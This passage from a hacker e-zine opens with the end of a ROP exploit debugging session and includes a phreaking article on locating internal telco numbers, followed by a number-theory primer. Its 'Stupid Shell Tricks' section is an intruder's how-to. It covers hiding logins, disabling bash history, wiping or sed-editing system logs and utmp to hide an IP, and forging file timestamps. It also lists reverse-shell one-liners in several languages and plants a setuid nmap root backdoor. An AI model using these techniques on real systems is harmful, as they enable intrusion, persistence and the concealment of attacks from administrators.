0x8048418 <coff+10>: ret
0x8048419 <coff+11>: add %al,(%eax)
0x804841b <coff+13>: mov 0x8(%ebp),%eax
0x804841e <coff+16>: mov -0xc(%ebp),%edx
(gdb) si
0x08048418 in coff ()
(gdb) i r eax
eax 0xffdca150 -2318000
(gdb) si
Cannot access memory at address 0x41414145
(gdb) x/5i $eip
=> 0x8048449 <tcomp+6>: neg %eax
0x804844b <tcomp+8>: pop %ebp
0x804844c <tcomp+9>: ret
0x804844d <main>: push %ebp
0x804844e <main+1>: mov %esp,%ebp
(gdb) si
0x0804844b in tcomp ()
(gdb) i r eax
eax 0x235eb0 2318000
(gdb) x/32x $esp
0xbfffef48: 0x41414141 0x080483f0 0xbffff310 0x00000000
0xbfffef58: 0xbfffefd8 0x00212e36 0x00000002 0xbffff004
0xbfffef68: 0xbffff010 0xb7fff478 0x00110414 0xffffffff
0xbfffef78: 0x001f8fbc 0x08048243 0x00000001 0xbfffefc0
0xbfffef88: 0x001e8da7 0x001f9ab8 0xb7fff758 0x00381ff4
0xbfffef98: 0x00000000 0x00000000 0xbfffefd8 0xa41d67a2
0xbfffefa8: 0x199850dd 0x00000000 0x00000000 0x00000000
0xbfffefb8: 0x00000002 0x08048340 0x00000000 0x001ef420
(gdb) si
0x0804844c in tcomp ()
(gdb) i r ebp
ebp 0x41414141 0x41414141
(gdb) x/5i $eip
=> 0x804844c <tcomp+9>: ret
0x804844d <main>: push %ebp
0x804844e <main+1>: mov %esp,%ebp
0x8048450 <main+3>: and $0xfffffff0,%esp
0x8048453 <main+6>: sub $0x10,%esp
(gdb) x/32x $esp
0xbfffef4c: 0x080483f0 0xbffff310 0x00000000 0xbfffefd8
0xbfffef5c: 0x00212e36 0x00000002 0xbffff004 0xbffff010
0xbfffef6c: 0xb7fff478 0x00110414 0xffffffff 0x001f8fbc
0xbfffef7c: 0x08048243 0x00000001 0xbfffefc0 0x001e8da7
0xbfffef8c: 0x001f9ab8 0xb7fff758 0x00381ff4 0x00000000
0xbfffef9c: 0x00000000 0xbfffefd8 0xa41d67a2 0x199850dd
0xbfffefac: 0x00000000 0x00000000 0x00000000 0x00000002
0xbfffefbc: 0x08048340 0x00000000 0x001ef420 0x00212d5b
(gdb) si
Cannot access memory at address 0x41414145
(gdb) x/5i $eip
=> 0x80483f0 <frame_dummy+32>: call *%eax
0x80483f2 <frame_dummy+34>: leave
0x80483f3 <frame_dummy+35>: ret
0x80483f4 <foo>: push %ebp
0x80483f5 <foo+1>: mov %esp,%ebp
(gdb) si
__libc_system (line=0xbffff310 "/bin/bash") at ../sysdeps/posix/system.c:179
179 {
(gdb) c
Continuing.
Detaching after fork from child process 16945.
[storm@Dysthymia audit]$ echo ROP til you drop
ROP til you drop
[storm@Dysthymia audit]$
VIII. References and Further Reading
====================================
[1] http://sickness.tor.hu/?p=374
[2] http://sickness.tor.hu/?p=378
[3] http://www.technovelty.org/linux/pltgot.html
[4] http://www.ibm.com/developerworks/linux/library/l-sp4/index.html
[5] http://www.phrack.org/issues.html?issue=58&id=4
Special thanks to corelanc0d3r, phetips, and zx2c4 for their review and suggestions.
[==================================================================================================]
-=[ 0x07 A New Kind of Google Mining
-=[ Author: Shadytel, Inc
-=[ Website: http://www.shadytel.com
There are two kinds of CEOs in this world: those who take advantage of every resource they possibly
can, and pussies. Our arrest at a Communications Fraud Control Association convention suggests
there's more of the latter than we thought, so there seemed no better time than now to help fellow
corporate overlords expand their ruthlessness.
There are times when scanning can flat out suck - we'll be the first to admit it. There's no better
way to kill your initiative than to go through a range filled with numbers that just ring or put you
on the phone with bewildered subscribers. If you're just looking for an interesting way to kill some
time, there's a much easier way. Here to give you a hand is a tool you'd never expect: Google Maps.
For example, let's do a search for AT&T in Terre Haute, Indiana. Keeping in mind that all the AT&T
results that are legitimately cell phone stores have the AT&T logo by them, let's pick the first one
that doesn't: 812-235-0096. What we got wasn't a bad start at all.
"You've reached AT&T in Terre Haute, Indiana. This is an unmanned site. Please leave a message after
the tone or if you need immediate assistance, contact the on-site workforce."
While it's noteworthy that the mailbox in question is on a Nortel PBX, the configuration is pretty
well locked down. So to even the odds out a little, we'll throw out another nifty technique - this
time an IVR made by Verizon shortly before the Frontier buyout of several states. The CLEC
maintenance center is pretty much what it sounds like: an IVR for switchless resellers to help test
customer lines and create trouble reports. Give it a try: (877) 503-8260. Right away, you'll be
asked for the OCN of the company you work for. Type in 0772; this goes for all unported Verizon or
Frontier lines in ex-GTE states. Select the "all other" category, the state of Indiana, and give it
the number to the AT&T PBX.
Once it looks up the account number, you'll be greeted with four options:
Press one for 812-235-0096
Press two for 812-235-0575
Press three for 812-235-4781
Press four for 812-235-5087
These all correspond to numbers associated with that same account. So not a bad way to find a few
interesting numbers, right? Here are a few other nice things we found.
207-693-9920 - Sensaphone (searched for Fairpoint in Portland, ME)
406-495-1408 - Weird ANAC, test command 7 is non-functioning ringback (searched for Qwest
Communications in Helena, MT)
304-263-2510 - Verizon Potomac Assignment Provisioning Center number changed recording (Searched for
C&P Telco in Martinsburg, WV)
That last listing brings us to two final points. First of all, type slowly - the auto-suggest
feature is a better friend than you might think. Second, sometimes the best way to search is to use
the names of phone companies that don't exist anymore - or just aren't generally used to do business
with the public. For example, C&P Telephone hasn't existed since the Bell System breakup. MCI is
another good one, but there are also quite a few numbers that ring out, so it can be a little
tedious. We personally like AT&T best, since they constantly feel the need to share their more
interesting internal numbers.
So like the article itself, this technique probably isn't for anybody wanting a long-term project;
but if you want something instantly - whether it be excitement, lulz, or puzzling contraptions to
cut your teeth with, just add water.
As always, keep it evil, keep it shady, keep it ruthless.
[==================================================================================================]
-=[ 0x08 Stupid Shell Tricks
-=[ Author: teh crew
Logging into SSH and interacting with a shell is probably necessary at one point or another in one's
hacking career. We've compiled a list of tips and tricks from various individuals in the community
that may prove helpful next time you're looking to avoid detection and cover your tracks on a
system.
-----
The common way to list logged-in users has always been the `w` command. First read in article 0x04
of Phrack #64, the -T flag in ssh can be used to not allocate a tty upon login, preventing the user
from being listed in `w` output:
ssh -T storm@gonullyourself.org
This obviously leaves you with a blank prompt, so it's not a bad idea to simulate one:
ssh -T storm@gonullyourself.org bash -i
For those who care, we can prevent logging the remote host's information to known_hosts through:
ssh -T -o UserKnownHostsFile=/dev/null storm@gonullyourself.org bash -i
Not having a tty causes some predictable issues with certain programs. Utilities like `man` and
`less` will print out data in its entirety instead of fitting it to the terminal and providing
scrollability. `screen` will flat-out refuse to work:
[storm@mania ~]$ screen
Must be connected to a terminal.
Fortunately, we can fake a tty using Python which gives us somewhat broken support for some of the
utilities we want to use:
[storm@mania ~]$ python -c 'import pty;pty.spawn("/bin/sh")'
sh-3.2$ perl -e'print "$_\n" for ( 1 .. 20 )' > /tmp/count
perl -e'print "$_\n" for ( 1 .. 20 )' > /tmp/count
sh-3.2$ less /tmp/count
less /tmp/count
WARNING: terminal is not fully functional
/tmp/count (press RETURN)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
/tmp/count
18
:
19
:
20
(END) q
sh-3.2$
Commands like `ps aux` that output long lines of text will be truncated at 80 characters, but this
can be overcome with a pipe to `cat`:
sh-3.2$ ps aux | cat
Be sure to kill the python process upon disconnecting, or the process may remain open and spike the
CPU load.
-----
Once logged into a host, it's common practice to disable logging mechanisms. Bash uses environment
variables to control that session's logging behavior. Note that the shell log is only recorded to
file upon exiting the shell, so one may manipulate the environment variables at any time. Any of
the following commands will prevent Bash from writing the session log to .bash_history:
[storm@mania ~]$ unset HISTFILE
[storm@mania ~]$ export HISTFILE=
[storm@mania ~]$ export HISTFILE=/dev/null
[storm@mania ~]$ export HISTSIZE=0
[storm@mania ~]$ export HISTFILESIZE=0
[storm@mania ~]$ export HISTIGNORE=*
[storm@mania ~]$ export HISTCONTROL=ignorespace # all commands prefixed with
# a space will be ignored
The last two commands will write the command itself to .bash_history but nothing after it.
Should the environment variables above be marked read-only, there are a few more intrusive options
still available:
[storm@mania ~]$ history -c
[storm@mania ~]$ ln -fs /dev/null .bash_history
[storm@mania ~]$ rm .bash_history && mkdir .bash_history
System logs are just as important to consider as user logs, but require root access to manipulate.
A quick and dirty (and VERY intrusive and VERY discoverable) way of killing system logging on a box
is to simply symlink everything to /dev/null:
[root@mania ~]# find /var/log -exec ln -fs /dev/null {} \;
The wiser thing would be to search pertinent log files manually (or with `sed`) and remove any
entries related to your activities. Common log paths are:
/var/log/messages*
/var/log/secure*
/var/log/audit*
/var/log/auth*
In addition, Linux records logins and miscellaneous user data to several other files. Since these
files use specific data structures to store data instead of plaintext entries with newlines, they
are commonly just deleted, despite how intrusive that is.
/var/log/btmp
/var/log/wtmp
/var/log/lastlog
/var/run/utmp
Utilities like `w`, `who`, `last`, `lastb`, and `lastlog` pull their data from these files.
As always, every action has a reaction, and care must be taken even when simply trashing log files.
An extra step may mean the difference between an administrator shrugging off an anomaly and being
fully alerted to a compromise.
[root@mania ~]# rm -f /var/log/wtmp
[root@mania ~]# last
last: /var/log/wtmp: No such file or directory
Perhaps this file was removed by the operator to prevent logging last info.
[root@mania ~]# touch /var/log/wtmp
[root@mania ~]# last
wtmp begins Mon Nov 21 20:58:36 2011
[root@mania ~]#
It is actually fairly trivial to tamper with the contents of these files to hide your tracks instead
of full-out deleting everything. A simple `sed` is our friend here, where we can replace our IP
address with any string so long as it's the same length:
[root@mania ~]# w
22:28:03 up 79 days, 4:35, 1 user, load average: 0.06, 0.04, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
storm ttyp0 111.22.333.444 22:22 0.00s 0.05s 0.01s sshd: storm [priv]
[root@mania ~]# sed -i 's/111.22.333.444/8============D/g' /var/run/utmp
[root@mania ~]# w
22:28:36 up 79 days, 4:36, 1 user, load average: 0.03, 0.04, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
storm ttyp0 8============D 22:22 0.00s 0.06s 0.01s sshd: storm [priv]
Awwwww yeahhhhhh.
Also be mindful of applications that have their own logging mechanisms, like Apache, MySQL, or
Pure-FTPd. Most applications will log to /var/log by default, but checking the running processes
(`ps aux`) for weird applications that may not follow this same practice is always a good idea.
Datacenters with a large number of servers to manage may also employ centralized logging software
that redirects log entries to a different server as soon as they are generated. If this is the
case, then research should be done on the software itself to see how it should be temporarily
disabled or modified to hide tracks. Once the entries are generated, however, they're gone, unless
the logging server is compromised. Have fun.
When modifying any file that may be under close scrutiny by an administrator, always be sure to
change the timestamps back to their original values with `touch` to prevent suspicion from arising.
Below is an example of changing a file's access and modification times to February 15, 2011 3:23:51:
[storm@mania ~]$ touch test.log
[storm@mania ~]$ stat test.log
File: `test.log'
Size: 0 Blocks: 0 IO Block: 4096 regular empty file
Device: 9026h/36902d Inode: 103219222 Links: 1
Access: (0664/-rw-rw-r--) Uid: ( 500/ storm) Gid: ( 500/ storm)
Access: 2011-09-09 19:45:44.000000000 -0700
Modify: 2011-09-09 19:45:44.000000000 -0700
Change: 2011-09-09 19:45:44.000000000 -0700
[storm@mania ~]$ touch -t 201102150323.51 test.log
[storm@mania ~]$ stat test.log
File: `test.log'
Size: 0 Blocks: 0 IO Block: 4096 regular empty file
Device: 9026h/36902d Inode: 103219222 Links: 1
Access: (0664/-rw-rw-r--) Uid: ( 500/ storm) Gid: ( 500/ storm)
Access: 2011-02-15 03:23:51.000000000 -0800
Modify: 2011-02-15 03:23:51.000000000 -0800
Change: 2011-09-09 19:47:37.000000000 -0700
[storm@mania ~]$ ls -l test.log
-rw-rw-r-- 1 storm storm 0 Feb 15 2011 test.log
[storm@mania ~]$
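For the curious, the same experiment can be sketched in Python. This is only an illustration on a
throwaway temp file: os.utime() sets the access and modification times explicitly, and we read all
three timestamps back with os.stat(). The helper name set_times is ours.

```python
import datetime
import os
import tempfile

def set_times(path, epoch):
    """Set atime and mtime to `epoch`, then return (atime, mtime, ctime)."""
    os.utime(path, (epoch, epoch))
    st = os.stat(path)
    return st.st_atime, st.st_mtime, st.st_ctime

# Throwaway file so nothing real gets touched.
fd, path = tempfile.mkstemp(suffix=".log")
os.close(fd)

# February 15, 2011 3:23:51 local time, same as the touch example.
target = datetime.datetime(2011, 2, 15, 3, 23, 51).timestamp()
atime, mtime, ctime = set_times(path, target)
os.unlink(path)

print("atime:", datetime.datetime.fromtimestamp(atime))
print("mtime:", datetime.datetime.fromtimestamp(mtime))
print("ctime:", datetime.datetime.fromtimestamp(ctime))   # stamped by the kernel
```

The first two values come back as requested, while the third reflects the moment the metadata was
changed, just like the Change line in the stat output.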
Note that while you can tamper with the Access and Modify timestamps, the GNU coreutils manual
states that the Change time (called the file's ctime field) cannot be tampered with.
Oh, wait. Yes it can.
By changing the system time, immediately `touch`ing the file, and then changing the system time back
to normal, you can trick the ctime value to any timestamp you'd like. Unfortunately, this technique
doesn't work on most VPSes since the time is permanently synchronized with the hardware clock.
[root@Dysthymia ~]# date -s "2011-02-15 03:23:51"; touch test.log
Tue Feb 15 03:23:51 EST 2011
[root@Dysthymia ~]# stat test.log
File: `test.log'
Size: 0 Blocks: 0 IO Block: 4096 regular empty file
Device: fd01h/64769d Inode: 98059 Links: 1
Access: (0644/-rw-r--r--) Uid: ( 0/ root) Gid: ( 0/ root)
Access: 2011-02-15 03:23:51.001999960 -0500
Modify: 2011-02-15 03:23:51.001999960 -0500
Change: 2011-02-15 03:23:51.001999960 -0500
Woot. We can determine whether this is possible or not beforehand by looking at the output of
`hwclock`:
[root@mania storm]# hwclock --show
Cannot access the Hardware Clock via any known method.
Use the --debug option to see the details of our search for an access method.
A physical server would print out the current time, so this is obviously not a good sign.
-----
For one reason or another, you may want to spawn a reverse shell. There are many ways to do this,
but we've included a few one-liners that don't require uploading extra tools to do (it is assumed
here that the host receiving the connection has the IP address 10.0.0.1). These examples were
copied/pasted from http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet, but we
felt they were too useful to not include:
Bash
$ bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
Perl
$ perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));
if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");
open(STDERR,">&S");exec("/bin/sh -i");};'
Python
$ python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
PHP
$ php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
# Assuming that the TCP connection uses file descriptor 3
Ruby
$ ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;
exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
To spawn a reverse shell by means of xterm, the following command should be run on the target host:
$ xterm -display 10.0.0.1:1
while the commands here are run on the receiving host:
$ Xnest :1
$ xhost +targetip
It is also very classic to spawn a shell using netcat:
$ nc -e /bin/sh 10.0.0.1 1234
However, some versions of netcat do not support the -e flag, in which case the following command may
be used instead:
$ rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
-----
Once you gain root, you probably want to keep it. One doesn't always have the time or patience to
install a rootkit, so crude backdoors are chosen instead. These quick solutions are usually
giant balls of suck, like adding a second root user. Why not use nmap as a backdoor?
Nmap has a little-known feature called interactive mode, which grants the ability to not only
perform port scans without broadcasting your parameters to everyone logged into the system, but also
to execute shell commands. Let's take a look at the nmap manpage:
--interactive (Start in interactive mode)
Starts Nmap in interactive mode, which offers an interactive Nmap
prompt allowing easy launching of multiple scans (either
synchronously or in the background). This is useful for people who
scan from multi-user systems as they often want to test their
security without letting everyone else on the system know exactly
which systems they are scanning. Use --interactive to activate this
mode and then type h for help. This option is rarely used because
proper shells are usually more familiar and feature-complete. This
option includes a bang (!) operator for executing shell commands,
which is one of many reasons not to install Nmap setuid root.
Of course, we're not going to listen to their advice.
root@Wakari:~# chmod u+s /usr/bin/nmap
root@Wakari:~# logout
storm@Wakari:~$ nmap --interactive
Starting Nmap V. 5.21 ( http://nmap.org )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !sh
# whoami
root
This plants an easily accessible root shell on the system without creating too much noise. Should
the setuid bit ever be discovered, inexperienced administrators will probably overlook this detail
simply because it would be somewhat logical for nmap to be installed this way to perform its packet-
fu (of course, discounting security). Maybe you'll come across a box with an administrator that
thinks the same way too.
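For reference, the setuid bit is nothing more than a flag in the file's mode, which is also what
makes it easy to spot. A minimal Python sketch, assuming nothing beyond the standard library (the
function names are ours, and the nmap path is just the one from the example above):

```python
import os
import stat

def has_setuid(path):
    """True if the setuid bit is set in the file's mode."""
    return bool(os.stat(path).st_mode & stat.S_ISUID)

def is_setuid_root(path):
    """True if the file is setuid AND owned by uid 0."""
    st = os.stat(path)
    return bool(st.st_mode & stat.S_ISUID) and st.st_uid == 0

candidate = "/usr/bin/nmap"        # path taken from the example above
if os.path.exists(candidate):
    print(candidate, "setuid root:", is_setuid_root(candidate))
else:
    print(candidate, "not present on this box")
```

This is the same information `ls -l` shows as an 's' in the owner's execute slot.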
-----
If you have any stupid (or leet, we don't judge) shell tricks you'd like to share, send them in to
zine@gonullyourself.org and we'll try to compile a part two if there's enough interest.
[==================================================================================================]
-=[ 0x09 An Introduction to Number Theory
-=[ Author: dan
-=[ IRC: irc.gonullyourself.org #gny
Mathematics blends well with computation. To shamelessly steal from the authors of the classic
programming book "Structure and Interpretation of Computer Programs," mathematics explains "what is"
while computation explains "how to." To quote the equally authoritative television show "Married
with Children," you can't have one without the other.
The following paragraph is titled "How to Piss Off Every Mathematician in the World."
I will not be including any proofs in this article. Since most mathematicians will scorn this, I
feel the need to give a small defense of my choice. First, this article doesn't cover any advanced
topics, and proofs for any theorems given are easily accessible on the internet. Second, I feel
proofs would take away from this article. Reading mathematics is not like reading other works, and
those with less experience with mathematics will read this article in one linear scan (not the best
way). If it were full of tedious proofs they didn't care about, they probably wouldn't make it to
the end of the article, or enjoy themselves very much.
When I present theorems, I will do so without proof. For the programmers out there, this is like
giving you the API without the source. You can do all kinds of neat stuff with the API (assuming it
works as advertised), but you don't really know what's going on. If you're interested in learning
more about the theorems, feel free to look them up on your own.
Number Theory is the study of numbers. Yeah, the study of numbers. You might be thinking that is
the definition of mathematics as a whole, but it's really not. Several areas of mathematics aren't
really about the study of numbers, even though numbers might be a great way to explore those
different topics. For example, arithmetic is the study of quantity, not numbers, but quantity is
easily described using numbers. Modern Algebra is the study of abstract structures, which often
uses integers and real numbers as examples, but they are not the main purpose of Modern Algebra.
Number Theory is the study of numbers. I recently read a book where the author abused the word
"sexy" a lot. So, I plan to do the same. Number Theory is misconceived by many people as being one
of the sexier areas of mathematics. Number Theory is not sexy, but it is fun. Part of why it's fun
is because a lot of the topics can be described in simple terms that many of us learned at a young
age. Since Number Theory is about numbers, rather than a more general topic, a lot of times people
new to the subject can find the books random, or they seem to jump around. This article will seem
that way as well, since it's designed mainly as an overview. The goal is to cover properties of
numbers that, through the centuries, have been deemed important and interesting.
Number Theory for a long time was known as being one of the least applicable areas of mathematics to
the real world. This started to change when applications were found in cryptography. This is when
Number Theory quit being fun and started being sexy. It's time to start making number theory fun
again.
Natural Numbers: Depending on what book you read, Natural Numbers either start with 0, or 1. Yeah,
mathematics, the most rigorous of all disciplines, can't really decide if 0 is a natural number or
not. To be quite honest we should just get some international organization together to vote and
decide if Pluto is a planet or not, I mean if 0 is a natural number. Most books related to
programming will include 0 in the natural numbers, because it goes along well with indexing arrays
starting at 0, and so on. Most number theory books (at least the ones I've seen) start the natural
numbers at 1. So, since the people who devoted their lives to studying numbers seem to think 1 is
the first natural number, I'm going to go with their definition.
Natural Numbers: 1,2,3,4,5,6,7,...
Integers: ...,-7,-6,-5,-4,-3,-2,-1,0,1,2,3,4,5,6,7...
Now, let's take a brief tour of Number Theory.
The first thing we need to learn about is the "Fundamental Theorem of Arithmetic"
Protip: if something is called "fundamental theorem of..." it's really fucking important
The way to describe "FTA" in English: Every natural number greater than 1 is either a prime number
or can be represented as a product of prime numbers, and that representation is unique up to the
order of the factors.
Prime Number: a natural number, 2 or greater, that is only divisible by 1 and itself.
Notice a prime number must be 2 or greater. A mistake many beginners make is assuming that 1 is a
prime number. It's not, by definition.
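For the programmers, here is a rough sketch of what the FTA promises, using plain trial division.
The function name prime_factors is made up for this example, and trial division is only the
simplest way to do this, not a fast one.

```python
def prime_factors(n):
    """Return the prime factors of n (n >= 2) in ascending order, with repeats."""
    if n < 2:
        raise ValueError("n must be a natural number greater than 1")
    factors = []
    d = 2
    while d * d <= n:
        # Divide out d as many times as it goes in evenly.
        while n % d == 0:
            factors.append(d)
            n //= d
        d += 1
    if n > 1:
        # Whatever is left over has no smaller factor, so it is prime.
        factors.append(n)
    return factors

print(prime_factors(360))  # [2, 2, 2, 3, 3, 5]
print(prime_factors(29))   # [29]
```

A prime comes back as a list containing only itself, which matches the "or is a prime number"
part of the statement.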
Continuing on, the fundamental theorem of arithmetic is what gives us the power to play with numbers
in a lot of interesting ways. For example, we can now explore the divisibility of the natural
numbers.
People who study number theory often times talk about division and divisibility so much that they
came up with their own special notation.
a|b, read as "a divides b" means that b = a*k, where k is some integer.
Examples: 2|6 since 6 = 2*3, (in this example k = 3)
5|10 since 10 = 5*2 (k = 2)
When I see these I always read them as a "is a factor of" to keep it straight in my head.
a|b a "is a factor of" b
2|6 2 "is a factor of" 6
5|10 5 "is a factor of" 10
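In code, "a divides b" is just a remainder check. A minimal sketch in Python follows. The helper
names divides and divisors are invented for illustration, and a is assumed to be nonzero.

```python
def divides(a, b):
    """True when a|b, i.e. b = a*k for some integer k (a must be nonzero)."""
    return b % a == 0

def divisors(n):
    """All natural numbers that divide the natural number n."""
    return [d for d in range(1, n + 1) if divides(d, n)]

print(divides(2, 6))   # True
print(divides(5, 10))  # True
print(divides(2, 5))   # False
print(divisors(10))    # [1, 2, 5, 10]
```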
Remember, number theory is the study of numbers. So we're interested in questions about numbers,
questions like, which numbers divide which other numbers? What's the biggest divisor a number has?
Is there anything special about numbers that share divisors?
One of the more popular things to do with divisors is to find the greatest common divisor of two
numbers.
Greatest Common Divisor: the greatest, common, divisor two numbers have.
It's hard to get a more descriptive name than that.
Let's do this by hand once. Consider 5 and 10.
true:     1|5   since 5 = 1 * 5
not true: 2|5   since 5 = 2*k, solve for k, and you get k = 5/2 = 2.5, not an integer
not true: 3|5   ...
not true: 4|5   ...
true:     5|5   since 5 = 5 * 1
true:     1|10  since 10 = 1 * 10
true:     2|10  since 10 = 2 * 5
not true: 3|10  ...
not true: 4|10  ...
true:     5|10  since 10 = 5 * 2
not true: 6|10  ...
not true: 7|10  ...
not true: 8|10  ...
not true: 9|10  ...
true:     10|10 since 10 = 10 * 1
So they have the following divisors in common, 1, and 5.
5 is the biggest one, so the greatest common divisor of 5 and 10 is 5.
This is often written in one of two forms: gcd(5,10) = 5, or just (5, 10) = 5 (we'll avoid the
second form since it can confuse people into thinking of points).
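The by-hand search above can be sketched in a few lines of Python. The names divisors and
gcd_by_hand are made up for this example. The brute-force search is only there to mirror the
hand computation; Python's standard library already ships math.gcd, shown for comparison.

```python
import math

def divisors(n):
    """Set of natural numbers that divide the natural number n."""
    return {d for d in range(1, n + 1) if n % d == 0}

def gcd_by_hand(a, b):
    """Greatest element that the two divisor sets have in common."""
    common = divisors(a) & divisors(b)
    return max(common)

print(sorted(divisors(5) & divisors(10)))  # [1, 5]
print(gcd_by_hand(5, 10))                  # 5
print(math.gcd(5, 10))                     # 5
```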
Euclid's Algorithm is very special; it's considered one of the oldest algorithms still in common
use. Euclid's algorithm computes the gcd of two numbers very quickly. But since I'm not doing
proofs or explaining the "how to" part of things, I'm going to leave this out.
You might have noticed something from the above examples of finding all the divisors. It seems
that every number is divisible by 1. We didn't prove this (because we're not proving stuff), but
it's true. As a result, no matter what two natural numbers you get, they'll always have a
greatest common divisor, but it might just be 1.
When two numbers have a greatest common divisor of 1 we say that they are relatively prime (also
called coprime).
gcd(4, 7) = 1, so relatively prime
gcd(10, 9) = 1, relatively prime
This leads to another question that number theorists for some reason find interesting: given a
number, how many numbers less than it are relatively prime to it?
There's actually a function for this. It's called Euler's Phi function (\phi in LaTeX), and you
might recognize it from the article on RSA from the last issue of GNY.
Let's try it out, let's take 6 as an example.
What's \phi(6)?
Well,
gcd(1, 6) = 1 relatively prime!
gcd(2, 6) = 2
gcd(3, 6) = 3
gcd(4, 6) = 2
gcd(5, 6) = 1 relatively prime!
gcd(6, 6) = 6
so \phi(6) = 2
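The same counting can be done by brute force in Python. This is a minimal sketch that follows the
definition directly (the function name phi is just a label chosen here); it is not how a real
computer algebra system would compute it.

```python
from math import gcd

def phi(n):
    """Count the k in 1..n that are relatively prime to n."""
    return sum(1 for k in range(1, n + 1) if gcd(k, n) == 1)

print([k for k in range(1, 7) if gcd(k, 6) == 1])  # [1, 5]
print(phi(6))                                      # 2
```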
So, I should mention that Euler's Phi function is also sometimes referred to as Euler's Totient
function. I mention this because I'm getting sick of doing everything by hand, so I'm going to
start using the computer algebra system known as maxima (http://maxima.sourceforge.net).
(%i1) totient(2);
(%o1) 1
(%i2) totient(3);
(%o2) 2
(%i3) totient(5);
(%o3) 4
(%i4) totient(29);
(%o4) 28
(%i5) totient(113);
(%o5) 112
There's something interesting here. Whenever we look at \phi(k), where k is prime, the answer
is k - 1. I won't explain this, but try to prove it to yourself: think about the definition of
Euler's Phi function and why primes would do this.
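If you don't have maxima handy, the pattern can be checked with a brute-force count in Python. This
is only a sketch: phi is a name picked for this example, and checking five primes is evidence, not
a proof.

```python
from math import gcd

def phi(n):
    """Count the k in 1..n that are relatively prime to n."""
    return sum(1 for k in range(1, n + 1) if gcd(k, n) == 1)

for p in (2, 3, 5, 29, 113):
    # Same inputs as the maxima session above.
    print(p, phi(p), phi(p) == p - 1)
```

Every line prints True in the last column for these primes.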
Fermat's Little Theorem: If p is prime, then p | (n^p - n), where n is any integer.
Probably the most interesting thing about Fermat's Little Theorem from a pure number theory point of
view is the proof, so I suggest you go off and read several of them. :)
To the people who are interested in studying the sexy side of number theory, Fermat's Little Theorem
is the equivalent of the Little Black Dress (heh they both have "little" in the names, clever).
Not purely number theory, but with this theorem and some statistics you can pick very large numbers
and figure out with a high level of accuracy if they're prime or not. Of course it's possible to
test if a number is prime or not with 100% accuracy, but this is slow. Using Fermat's Little
Theorem to test for "primality" takes us slightly off course of pure number theory, but here's a
rough idea of how it works.
Suppose we want to test if 23 is prime. Pick a random number between 1 and 22.
(%i10) random(23);
(%o10) 7
Now check it with Fermat's Little Theorem
(%i12) 7^23-7;
(%o12) 27368747340080916336
(%i14) 27368747340080916336/23;
(%o14) 1189945536525257232
We got an integer back, so for n = 7, p = 23 Fermat's Little Theorem holds.
Now you just repeat this process; every time the test is successful, the odds of 23 being prime
go up. There are some composite numbers that can fool Fermat's Primality Test; these are called
Carmichael Numbers.
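The repeat-the-test idea can be sketched in Python like this. The function names and the default
of 20 rounds are assumptions made for illustration. Instead of computing the huge number n^p - n
and dividing, the sketch uses Python's three-argument pow to compare n^p and n modulo p, which is
the same check.

```python
import random

def fermat_holds(n, p):
    """True when p | (n^p - n), checked as n^p mod p == n mod p."""
    return pow(n, p, p) == n % p

def probably_prime(p, rounds=20):
    """Fermat test: try `rounds` random n in 1..p-1; one failure proves p composite."""
    if p < 2:
        return False
    for _ in range(rounds):
        n = random.randint(1, p - 1)
        if not fermat_holds(n, p):
            return False
    return True

print(fermat_holds(7, 23))   # True, same check as the maxima session
print(fermat_holds(2, 21))   # False, so 21 is definitely not prime
print(probably_prime(23))    # True
print(probably_prime(561))   # True, even though 561 = 3 * 11 * 17
```

561 is the smallest Carmichael Number, which is why it slips through no matter which n gets picked.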
Remainders: Kinda not just for elementary school.
Programmers are probably already familiar with the mod operation (usually '%') for finding the
remainder of two numbers.
30/11 = 2 remainder 8
With integer division used in most programming languages, we'd get:
30/11 = 2
30 % 11 = 8
30.0/11.0 = 2.727....
Like everything else, those kooky math people just had to have their own notation for remainders as
well.
30 % 11 = 8 is written as:
8 ≡ 30 (mod 11) (where instead of the equal sign having two bars it has three; in LaTeX this is
\equiv)
The above is read as: 8 is congruent to 30 mod 11.
Doing basic operations on congruences is called modular arithmetic.
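Here is how the remainder example looks in Python, as a quick sketch. Note that Python spells
integer division as // (a plain / gives the 2.727... answer). The helper congruent is a made-up
name that checks a congruence by asking whether n divides a - b.

```python
q, r = divmod(30, 11)
print(q, r)      # 2 8
print(30 // 11)  # 2
print(30 % 11)   # 8

def congruent(a, b, n):
    """True when a ≡ b (mod n), i.e. n divides a - b."""
    return (a - b) % n == 0

print(congruent(8, 30, 11))  # True
print(congruent(8, 31, 11))  # False
```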
Randomly, two numbers a and b are "Multiplicative Modular Inverses mod n" of each other if
a*b ≡ 1 (mod n)
One quick example, consider 2 (mod 5):
2*3 ≡ 1 (mod 5) (6 / 5 has remainder 1).
This means 2,3 are Multiplicative Modular Inverses of each other mod 5.
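A brute-force way to hunt for an inverse, sketched in Python. The name mod_inverse is invented for
this example, and trying every candidate is only sensible for small n. The last line uses Python's
built-in pow with a negative exponent, which needs Python 3.8 or newer.

```python
def mod_inverse(a, n):
    """Return b in 1..n-1 with a*b ≡ 1 (mod n), or None if there isn't one."""
    for b in range(1, n):
        if (a * b) % n == 1:
            return b
    return None

print(mod_inverse(2, 5))  # 3
print(mod_inverse(3, 5))  # 2
print(mod_inverse(2, 6))  # None
print(pow(2, -1, 5))      # 3
```

Not every number has an inverse: 2 has none mod 6, and gcd(2, 6) = 2 rather than 1.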
The end.
[==================================================================================================]
